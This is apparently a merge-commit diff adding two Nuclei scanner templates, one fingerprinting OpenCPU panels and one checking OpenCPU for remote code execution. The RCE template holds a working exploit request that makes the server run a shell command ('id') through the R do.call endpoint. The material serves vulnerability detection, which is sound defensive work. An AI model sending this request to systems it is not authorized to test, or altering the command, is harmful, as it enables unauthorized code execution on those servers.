Merge pull request projectdiscovery#6041 from projectdiscovery/opencp…

…u-templates

Added OpenCPU RCE / Panel

exposed-panels/opencpu-panel.yaml

@@ -0,0 +1,23 @@
+id: opencpu-panel
+
+info:
+  name: OpenCPU Panel
+  author: wa1tf0rme
+  severity: info
+  reference:
+    - https://github.com/opencpu/opencpu/
+  tags: opencpu,oss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/ocpu/"
+
+    max-redirects: 2
+    redirects: true
+    matchers:
+      - type: word
+        words:
+          - OpenCPU Test Page
+          - OpenCPU API Explorer
+        condition: or

vulnerabilities/opencpu/opencpu-rce.yaml

@@ -0,0 +1,43 @@
+id: opencpu-rce
+
+info:
+  name: OpenCPU RCE
+  author: wa1tf0rme
+  severity: critical
+  description: |
+    Checks for RCE in OpenCPU instance
+  reference:
+    - https://pulsesecurity.co.nz/articles/R-Shells
+    - https://github.com/opencpu/opencpu/
+  tags: rce,opencpu,oss
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/ocpu/library/base/R/do.call/json"
+
+    body: |
+      what=function(x){  return(system(paste('id'), intern %3d T))}&args={}
+
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+
+    max-redirects: 2
+    redirects: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - uid=
+          - gid=
+        condition: and
+
+      - type: status
+        status:
+          - 201
+
+    extractors:
+      - type: regex
+        group: 1
+        regex:
+          - \(([a-z-]+)\)